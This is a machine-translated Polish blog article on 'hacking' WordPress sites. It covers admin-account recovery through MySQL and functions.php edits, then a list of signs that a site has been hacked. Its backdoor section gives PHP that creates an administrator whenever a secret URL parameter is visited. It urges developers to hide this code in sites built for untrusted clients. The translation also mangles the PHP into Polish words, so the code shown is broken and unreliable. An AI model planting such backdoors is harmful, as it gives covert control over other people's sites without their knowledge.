Jak włamać się do witryny WordPress, kompletny przewodnik

Jak włamać się do witryny WordPress, kompletny przewodnik


Nie akceptujemy, nie aprobujemy ani nie zachęcamy do żadnego nielegalnego lub złośliwego zachowania! Celem tego artykułu jest wyjaśnienie, w jaki sposób zhakować lub odzyskać dostęp do witryny WordPress, która należy do Ciebie lub że masz uprawnienia do edycji, administrowania i dostępu. Cokolwiek robisz, robisz to sam. Nie ponosimy odpowiedzialności za twoje działania. Ten przewodnik służy wyłącznie do celów edukacyjnych.

Opisane metody pomogą ci odzyskać dostęp do strony, nawet jeśli nie masz już konta, ale będą wymagały pewnych informacji o witrynie i nie pomogą ci włamać się do dowolnej losowej instalacji WordPress.

W tym przewodniku pokażemy Ci:

  • Jak włamać się na stronę WordPress
  • Jak stworzyć backdoor w WordPress
  • Jak utworzyć nowe konto użytkownika przez FTP
  • 10 znaków, że Twoja witryna WordPress została zhakowana

Jak włamać się do witryny WordPress, kompletny przewodnik

Sytuacje, w których możesz sobie pomóc

Jeśli znajdziesz się w jednej z poniższych sytuacji, nasze metody pomogą Ci odzyskać dostęp:

  • zapomniałeś nazwy użytkownika lub adresu e-mail
  • opcja resetowania hasła nie działa na serwerze hostingowym
  • zresetuj hasło e-maile nie przychodzą
  • nie masz już dostępu do adresu e-mail konta
  • znasz nazwę użytkownika i hasło, ale kombinacja po prostu nie działa

Aby skorzystać z metod opisanych poniżej, będziesz potrzebować tylko jeden z poniższych:

  • Dostęp FTP do serwera lub
  • cPanelowy dostęp do serwera lub
  • dostęp do bazy danych MySQL i możliwość zdalnego połączenia z nią

Metoda nr 1 – sposób MySQL

Użyj tej metody, aby zmienić hasło (lub nazwę użytkownika, jeśli to konieczne) istniejącego użytkownika lub utworzyć nowe konto. Potrzebujesz dostępu cPanel lub bezpośredniego dostępu MySQL do bazy danych witryny. Zacznijmy od zmiany hasła istniejącego użytkownika.

Jeśli używasz cPanel, zaloguj się (do cPanel można zawsze uzyskać dostęp za pośrednictwem https://yoursite.com:2083 link), zlokalizuj i otwórz phpMyAdmin. Lista baz danych i tabel znajduje się po lewej stronie. Szukasz stołu, który się skończy _users. Pewnie tak będzie wp_users, ale jeśli masz więcej niż jedną witrynę WordPress zainstalowaną na serwerze, musisz znaleźć właściwą.

Odpowiednia tabela będzie zawierała użytkownika, którego chcesz edytować. Wykonaj tę samą procedurę, jeśli łączysz się z MySQL za pośrednictwem klienta zewnętrznego, takiego jak SQLyog. Po zlokalizowaniu tabeli i rzeczywistego rekordu użytkownika czas zmienić hasło.

Jak już zapewne wiesz, hasło jest zapisywane w user_pass pole, zaszyfrowane przy użyciu algorytmu MD5. Otworzyć online generator MD5 wprowadź hasło, którego chcesz użyć i kliknij „Hash”. Skopiuj wygenerowany ciąg i zastąp oryginalne hasło z tym. W phpMyAdmin możesz edytować pole, klikając je dwukrotnie. Procedura jest podobna w innych klientach MySQL. Zapisz zmiany i zaloguj się do WordPress przy użyciu nowego hasła.

Tabela użytkowników WP

Nazwy użytkowników, hashowane hasła i e-maile są przechowywane w wp_users tabela bazy danych

Nadal metoda nr 1 – tworzenie nowego użytkownika

Utworzenie nowego użytkownika jest nieco bardziej skomplikowane, ale nadal można nim zarządzać w mniej niż minutę. Utwórz nowy rekord w tabeli użytkowników i wpisz: user_login, user_pass (hashed, using the MD5 function above) i user_email. Wszystkie pozostałe pola mogą pozostać puste; nie mają znaczenia. Zapisz nowy rekord. Po zapisaniu MySQL da mu unikalny identyfikator. Jest to liczba w polu identyfikatora. Pamiętam.

Teraz idź do _usermeta stół. Zapamiętaj, prefiks tabeli musi być taki sam jak prefiks użytkownika. Na przykład wp_users i wp_usersmeta. Jeśli prefiks nie jest taki sam, edytujesz niewłaściwą tabelę (niektórych innych instalacji WP) i nowe konto nie będzie działać. Utworzymy dwa nowe rekordy. Zignoruj umeta_id pole dla obu z nich. Zestaw identyfikator użytkownika pole do właśnie zapamiętanej wartości (nowa wartość identyfikatora w tabeli użytkowników). Dla pierwszego zestawu rekordów meta_key do wpct_user_level i meta_value do 10. Po drugie meta_key do wpct_capabilities i meta_value do a: 1: {s: 13: „administrator”; b: 1;}. Zapisz oba. Gotowe – zaloguj się!

Metoda nr 2 – sposób functions.php

Podejście to można wykorzystać albo edytując functions.php poprzez cPanel lub używając do tego klienta FTP. Jeśli używasz cPanel, znajdź Menedżera plików i otwórz go. Najpierw musimy znaleźć folder aktywnego motywu.

Iść do public_html / wp_content / themes teczka. Jeśli od razu zobaczysz swój motyw i wiesz, który to jest – świetnie. Otwórz jego folder i rozpocznij edycję functions.php. Jeśli nie, otwórz witrynę, kliknij prawym przyciskiem myszy w dowolnym miejscu, wybierz „Wyświetl źródło”. Następnie naciśnij Ctrl + F i zacznij pisać / tematy / wkrótce podświetlisz wiele adresów URL i rozpoznasz nazwę folderu aktywnego motywu.

Znajdź go w strukturze plików, otwórz i rozpocznij edycję functions.php. Skopiuj / wklej następujący kod na końcu pliku. Pamiętaj o zamknięciu ?> Tagi PHP, jeśli je masz. Muszą być na ostatniej linii. Więc wstaw kod przed nimi.

$ new_user_email = '[email protected]';
$ new_user_password = '12345';

if (! username_exists ($ new_user_email)) {
$ user_id = wp_create_user ($ new_user_email, $ new_user_password, $ new_user_email);

wp_update_user (tablica ('ID' => $ user_id, 'nickname' => $ new_user_email));

$ user = nowy WP_User ($ user_id);
$ user-> set_role ('administrator');
}

Edytuj tylko dwa pierwsze wiersze kodu, aby odzwierciedlić nowe konto. Jeśli w WP jest już użytkownik z tym adresem e-mail, nowe konto nie zostanie utworzone, więc upewnij się, że jest nowe. Zmień także hasło – nie daj się zhakować dzieciom ze skryptów. Po zapisaniu pliku wystarczy otworzyć witrynę, kod zostanie uruchomiony, zostanie utworzone nowe konto z uprawnieniami administratora i będziesz mógł się na nim zalogować.

Po wykonaniu tej czynności pamiętaj o usunięciu kodu z functions.php.

Inne metody hakowania

Znając hasło FTP, cPanel lub MySQL, udowadniasz, że masz uzasadnione prawo dostępu do serwera, a zatem powinieneś również mieć dostęp do instalacji WordPress. Jeśli nie masz żadnego z tych kont, oznacza to, że nie masz nic dobrego (włamywanie się na witryny innych osób), a to nie jest miłe!

Należy pamiętać, że uzyskanie nieautoryzowanego dostępu do jakichkolwiek komputerów, witryn lub serwerów jest poważnym przestępstwem i jest niezwłocznie rozpatrywane w większości krajów.

Jeśli boisz się, że Twoja witryna WordPress może zostać zaatakowana przez hakerów, sprawdź tę stronę za pomocą bezpłatnego skanera bezpieczeństwa WordPress. Jeśli nie masz czasu na założenie bloga, zróbmy to za Ciebie.

Jak stworzyć backdoor w WordPress

Kiedy przednie drzwi są zamknięte, możesz spróbować tylnych drzwi. Może to zabrzmieć jak złośliwy sposób użycia kodu do wejścia na stronę bez dostępu do niej, ale w rzeczywistości czasami trzeba kontrolować własną witrynę, jeśli ktoś ją ukradł.

Jeśli tworzysz strony internetowe dla innych osób, co robisz, wcześniej czy później pojawi się klient, który odmówi zapłaty za twoją pracę; klient, który usunie twoje dane logowania i przejmie kontrolę nad wszystkim, co zrobiłeś. Czasami wystarczy utworzyć nowego użytkownika przez FTP lub zresetować hasło. Kiedy to nie wystarczy, możesz włamać się z powrotem lub utworzyć backdoorowy dostęp do swoich stron administracyjnych.

Ale jeśli zdecydujesz się ukryć mały fragment kodu w środowisku WordPress, możesz uratować sobie trochę godności i uzyskaj dostęp do strony WordPress z uprawnieniami administratora. I tu zaczynają się gry.

Bez względu na to, ile razy ten złodziej usuwa twoje informacje lub przywraca kopię zapasową na serwerze, którego prawdopodobnie jest właścicielem, istnieje szansa, że ​​nic nie wie o wejściach do backdoora. Gdyby to zrobił, prawdopodobnie nawet nie potrzebowałby twojej pomocy w konfiguracji WordPressa, prawda?

Utwórz backdoor:

OK, wystarczy z rozmową; oto fragment kodu, który będzie potrzebny do wykonania zadania:

  1. Otwórz plik functions.php
  2. Skopiuj / Wklej następujący kod:
  3. add Działalności („wp_head”, „wploop_backdoor”);
    funkcja wploop_backdoor () {
    Jeśli ($ _GET ['backdoor'] == 'knockknock') {
    wymagają ('wp-obejmuje / rejestracja.php');
    Jeśli (! Nazwa_użytkownika_istnieje („nazwa użytkownika”)) {
    $ user_id = wp_create_user ('name', 'pass');
    $ user = nowy WP_User ($ user_id);
    $ user-> set_role ('administrator');
    }
    }
    }
    ?>
  4. Zapisz zmiany

Jeśli pozostawisz ten kod bez zmian, wszystko, co musisz zrobić, aby utworzyć nowego administratora w witrynie, to wizyta http://www.twojadomena.com/?backdoor=knockknock

Po załadowaniu strony nowa nazwa użytkownika to “imię” i hasło “przechodzić”.

Oczywiście, możesz to zmienić w kodzie powyżej, zmieniając „name” i „pass” na cokolwiek chcesz. Możesz także zmienić link do tylnych drzwi, zmieniając „backdoor” i / lub „knockknock” na cokolwiek, co wymyślisz.

Wypróbuj tę funkcję – nie tylko jest fajna, ale może naprawdę ci pomóc w przyszłości, gdy masz zamiar stworzyć stronę internetową dla kogoś, komu nie możesz całkowicie zaufać. Powinieneś także podnieść poziom umiejętności WordPress i blogowania.

Jak utworzyć nowe konto użytkownika przez FTP

Tworzenie nowych kont użytkowników w WordPress jest bardzo łatwe. Jako administrator musisz przejdź do strony Administrator użytkowników gdzie możesz utworzyć nowe konto dla dowolnej roli użytkownika. Można to zrobić w ciągu kilku sekund, a nowo utworzony użytkownik może natychmiast zalogować się przy użyciu podanej nazwy użytkownika i hasła.

Ale co się stanie, jeśli stracisz dostęp do administratora WordPress? Sprawy mogą się nieco skomplikować, ale nie martw się – mamy dla Ciebie funkcję, która może uratować Ci życie administracyjne.

Niezależnie od tego, czy inny administrator usunął Twoje konto, czy przez pomyłkę usunąłeś wszystkich użytkowników z bazy danych, użyłeś nieprawidłowo działającej wtyczki lub zostałeś zhakowany, nadal możesz odzyskać kontrolę. Czasami możesz uzyskać dostęp tylko do swojego serwera FTP, podczas gdy serwer HTTP będzie poza twoim zasięgiem i będziesz musiał utworzyć nowego administratora. Może to być rzadki przypadek, ale poniższa funkcja Cię uratuje.

Aby utworzyć nowe konto poza środowiskiem administracyjnym WordPress, wszystko czego potrzebujesz to dostęp FTP do swojej witryny. Jako administrator powinieneś mieć wszystkie informacje potrzebne do zalogowania się na serwerze i możesz szybko utworzyć nowe konto, tworząc nową funkcję w swoim motywie.

Utwórz nowe konto użytkownika przez FTP:

  1. Otwórz klienta FTP i połącz się ze swoim kontem
  2. Przejdź do wp-content / themes
  3. Otwórz folder używanego motywu
  4. Wyszukaj plik functions.php i edytuj go
  5. Skopiuj i wklej następującą funkcję:
  6. funkcja admin_account () {
    $ user = 'Nazwa użytkownika';
    $ pass = 'Hasło';
    $ email = „[email protected]”;
    if (! username_exists ($ user) &&! email_exists ($ email)) {
    $ user_id = wp_create_user ($ user, $ pass, $ email);
    $ user = nowy WP_User ($ user_id);
    $ user-> set_role ('administrator');
    }}
    działanie dodatkowe („init”, „admin_account”);
    
  7. Zmień nazwę użytkownika, hasło i adres e-mail na coś wyjątkowego
  8. Zapisz zmiany

Upewnij się, że nazwa użytkownika, hasło i adres e-mail ustawione w funkcji są unikalne w przeciwnym razie funkcja nie będzie działać poprawnie. Po zapisaniu zmian jesteś gotowy i możesz przejść do panelu logowania WP. Użyj nowych informacji, aby zalogować się ponownie, a po zweryfikowaniu konta możesz usunąć funkcję z pliku functions.php.

Funkcja pokazana powyżej tworzy konto administratora, ale możesz je łatwo zmodyfikować, aby utworzyć konto z dowolną inną rolą użytkownika. Po prostu zmień rolę na 8th rząd kodu dla redaktora, autora, autora, subskrybenta lub dowolnej innej utworzonej przez Ciebie roli użytkownika.

Niestety, jeśli straciłeś swoje konto administratora, straciłeś także wszystkie posty napisane pod tą nazwą użytkownika. Dlatego zawsze powinieneś mieć kopię zapasową, którą możesz łatwo odzyskać. Jeśli czytasz to, mając konto administratora, weź to jako przypomnienie, aby natychmiast utworzyć kopię zapasową i dodaj ten artykuł do zakładek na wypadek, gdybyś w przyszłości musiał utworzyć konto poza WordPress.

10 znaków, że Twoja witryna WordPress została zhakowana

WordPress to ogromna platforma blogowa. Są miliony użytkowników i wydaje się, że liczba ta szybko rośnie każdego dnia. Ludzie mają nawet tendencję do przenoszenia swoich stron internetowych utworzonych w innych systemach zarządzania treścią do tego systemu open source częściej niż myślisz. I chociaż jest to dobre, oznacza to, że hakerzy umieszczą również WordPress na pierwszym miejscu podczas próby inwazji na losowe witryny.

Zwykle, jeśli zostaniesz zhakowany, natychmiast się o tym dowiesz. Twoja strona stanie się niedostępna; nie będziesz mógł się zalogować, a czasami haker nawet zostawi wiadomość na pierwszej stronie. Ale częściej niż nie, możesz nawet nie zauważyć, że coś się zmieniło. W tej części artykułu zamierzamy pokazać kilka znaków, które mogą wskazywać, że Twoja witryna WordPress została zaatakowana przez hakerów oraz kilka rozwiązań tego problemu.

1. Nieudane logowanie

Ten znak jest prawie widoczny. Jeśli używałeś kombinacji nazwy użytkownika i hasła przez jakiś czas bez problemów, możesz stać się podejrzany, jeśli nagle WordPress nie rozpoznaje twojego konta. Jeśli haker zaloguje się do Twojej witryny, istnieje duże prawdopodobieństwo, że szybko zmieni on uprawnienia administratora.

Może musi zmienić twoje hasło lub całkowicie usunąć twoje konto. Zanim zaczniesz panikować po pierwszym wyświetleniu przez WordPress wiadomości o niepoprawnej nazwie użytkownika / haśle, zastanów się nad tym, że mogłeś wpisać niewłaściwą kombinację lub że możesz włączyć przycisk Caps Lock.

Rozwiązanie: Spróbuj odzyskać hasło przez e-mail lub użyj innego konta, aby zalogować się ponownie. Aby upewnić się, że logowanie jest bezpieczne, zalecamy zainstalowanie Zaloguj się Ninja wtyczka do WordPress.

2. Szkodliwe treści są dodawane do Twojej witryny

Strona zawiera ostrzeżenie o złośliwym oprogramowaniu

Jeśli zaczniesz zauważać nieznane treści na swojej stronie, możesz zacząć się martwić. Gdy będą mieli dostęp do twojego obszaru administracyjnego, hakerzy będą mogli zmienić Twój rdzeń oraz pliki motywów i wtyczek. Oznacza to, że mogą zmienić wszystko, co chcą.

Podczas gdy niektórzy hakerzy drastycznie zmodyfikują wygląd Twojej witryny, a może nawet powiedzą, że zostałeś zhakowany, inni będą o tym bardziej subtelni.

Rozwiązanie: Spróbuj wyszukać ukrytą treść w kodzie witryny. W stopce witryny mogą znajdować się łącza do hakerów złośliwych witryn lub mogą oni zainstalować wyskakujące okienka, które będą regularnie otwierane dla klientów. Użyj Security Ninja, aby przeskanować witrynę lub stale monitorować witrynę pod kątem takich problemów.

3. Podejrzane wizyty

Jeśli nie śledzisz swojej witryny, powinieneś zacząć to robić natychmiast. Prostym sposobem jest skorzystanie z Google Analytics, który między wieloma innymi funkcjami może powiedzieć, ile odwiedzin i skąd pochodzą. Po pewnym czasie poznasz swoją stronę internetową. Oznacza to, że będziesz wiedział, skąd pochodzą wizyty, będziesz wiedział, kiedy uruchomisz nową kampanię i kiedy pojawią się nowe linki promocyjne na wolności.

Ale jeśli nagle zauważysz, że Twoja witryna otrzymuje ogromną liczbę nowych wizyt z podejrzanej domeny, będziesz chciał to zbadać, ponieważ Twoja witryna może zostać zaatakowana przez hakerów. Zazwyczaj tego rodzaju wizyty powodują 100% współczynnik odrzuceń, co oznacza, że ​​uzyskano dostęp tylko do jednej strony. Hakerzy często używają zautomatyzowanych systemów, które doprowadzą inne złe strony do twojego. Niezależnie od tego, czy jest to zły kod, który został wykonany w Twojej witrynie, czy też stałeś się częścią sieci spamującej, sprawy mogą stać się poważne i będziesz musiał sprawdzić witrynę pod kątem złośliwego kodu.

Rozwiązanie: Posługiwać się Narzędzia Google dla webmasterów znaleźć podejrzane domeny

4. Nagły spadek ruchu

Bezpieczne przeglądanie Stan witryny

W przeciwieństwie do ostatniego wspomnianego znaku włamania się, ten może cię ostrzec, ponieważ nagle spada liczba odwiedzin. Zamiast odsyłać do Ciebie nowe wizyty, haker może wysyłać wizyty poza Twoją witrynę. Może się tak zdarzyć, ponieważ haker przekierował Twoją witrynę na inną. Innym powodem zmniejszenia liczby odwiedzających jest fakt, że Google umieścił twoją witrynę na czarnej liście. Ta czynność wyświetli komunikat dla każdego użytkownika, który może nie otwierać witryny, ponieważ jest ona zainfekowana.

Rozwiązanie: Użyj Google Stan bezpiecznej przeglądarki aby sprawdzić, czy Twoja witryna jest oznaczona jako niebezpieczna i czy odwiedzanie jej jest obecnie niebezpieczne.

5. Wyniki wyszukiwania są dziwne

Jeśli nie zauważyłeś żadnych zmian w witrynie, ale okazuje się, że wyniki wyszukiwania w Google i innych wyszukiwarkach są dziwne (pokazują różne tytuły i inne metadane), może to być wyraźny znak zhakowanej witryny. Haker mógł zmienić Twoje treści w sposób widoczny dla eksperta. Mimo to zmiana byłaby widoczna w wynikach wyszukiwania.

Rozwiązanie: Sprawdź swoją witrynę za pomocą Narzędzia Google dla webmasterów, i sprawdź, czy Twoja witryna nie została zaatakowana przez to darmowe narzędzie online.

6. Nie możesz wysyłać / odbierać wiadomości e-mail

Gdy haker uzyska dostęp do Twojej witryny, prawdopodobnie będzie chciał używaj swojego serwera do spamowania wszystkich innych. Gdy dowiesz się, że nie możesz wysyłać ani odbierać nowych wiadomości e-mail z WordPress, może to być wyraźny znak, że zostałeś zhakowany. Sprawdź swój adres e-mail jeszcze raz, a następnie sprawdź go u swojego dostawcy, aby upewnić się, że nie ma żadnych błędów.

Rozwiązanie: Przetestuj swój WordPress funkcja poczty dzięki tej bezpłatnej wtyczce.

7. Witryna nie istnieje

nie znaleziono serwera

Czasami hakerzy nie uzyskują dostępu do Twojej witryny w celu umieszczenia złośliwego kodu, przekierowania użytkowników lub wykorzystania poczty e-mail do spamowania. Czasami, wszystko, co będą chcieli zrobić, to zawiesić witrynę. Rzadko haker z powodzeniem usuwa wszystko z całego serwera. Dlatego ważne jest, aby hostować pliki w renomowanej firmie hostingowej, która zapewni bezpieczeństwo, a także będzie codziennie lub co najmniej raz w tygodniu tworzyć kopie zapasowe witryny. Dobrą praktyką jest od czasu do czasu tworzenie własnych kopii zapasowych, aby szybko przywrócić witrynę.

Rozwiązanie: Zainstaluj jedną z najlepszych wtyczek do zarządzania kopiami zapasowymi w WordPress.

8. Podejrzane pliki

Podobne do złośliwych treści, które mogą być dodawane do istniejących plików, haker może zasadzić dodatkowe pliki w dowolnym miejscu w folderze głównym. Dobrze jest wiedzieć, jak obchodzić się z WordPress, ale jeśli nie masz doświadczenia, powinieneś mieć do dyspozycji narzędzie bezpieczeństwa, które może sprawdzić wszystkie twoje pliki i działania. Niedawno sprawdziliśmy Security Ninja, który jest doskonałym narzędziem do sprawdzania wszystkich plików WordPress.

Rozwiązanie: Spróbuj wyszukać pliki, które nie należą do Twojej instalacji WordPress. Użyj Security Ninja, aby regularnie skanować swoją witrynę i automatycznie znajdować te pliki. Następnie usuń pliki lub usuń złośliwy kod z zainfekowanych plików. Nie zapomnij o dodatku Core Scanner dla Security Ninja.

9. Nowi członkowie

W zależności od witryny możesz być jedynym, który może dodawać nowych członków. W takim przypadku wiadomość e-mail z informacją o nowo zarejestrowanych użytkownikach może wywołać alarm. Jeśli są inni administratorzy, którzy mają możliwość dodawania nowych członków, sprawdź u nich podejrzaną aktywność.

Rozwiązanie: Zmień adres URL logowania za pomocą bezpłatnej wtyczki, ogranicz dostęp do strony logowania WordPress za pomocą pliku .htpasswd i użyj Login Ninja, aby cały czas chronić formularz logowania.

10. Sprawdź zaplanowane wydarzenia na swoim serwerze

Czasami haker nie robi nic w Twojej witrynie, gdy tylko znajdzie się w witrynie, opuszczą zaplanowane wydarzenia co może zaszkodzić Twojej witrynie w przyszłości. Ta technika jest niebezpieczna, ponieważ haker może na początku pozostawić niedoświadczoną ofiarę bezradnym. Możesz zostać zainfekowany i nic o tym nie wiedzieć.

Rozwiązanie: Sprawdź swoje zadania CRON na używanym serwerze i upewnij się, że nie ma żadnych podejrzanych zaplanowanych zadań.

Podsumowując

Mamy nadzieję, że ten artykuł pomoże Ci zarządzać jeszcze bezpieczniejszą witryną WordPress i pomoże ci odzyskać dostęp do niej w złych sytuacjach. I nawet jeśli Twoja witryna jest czysta, nie bierz tego za pewnik.
Zawsze upewnij się, że Twój blog jest tak bezpieczny, jak to tylko możliwe. Sugerujemy wtyczki bezpieczeństwa do WordPress, które mogą cię w większości zaoszczędzić. Jednak nie używaj niebezpiecznego hasła i zachowaj ostrożność podczas włamywania się do własnej witryny WordPress.
Jeffrey Wilson Administrator
Sorry! The Author has not filled his profile.
follow me
    Liked Liked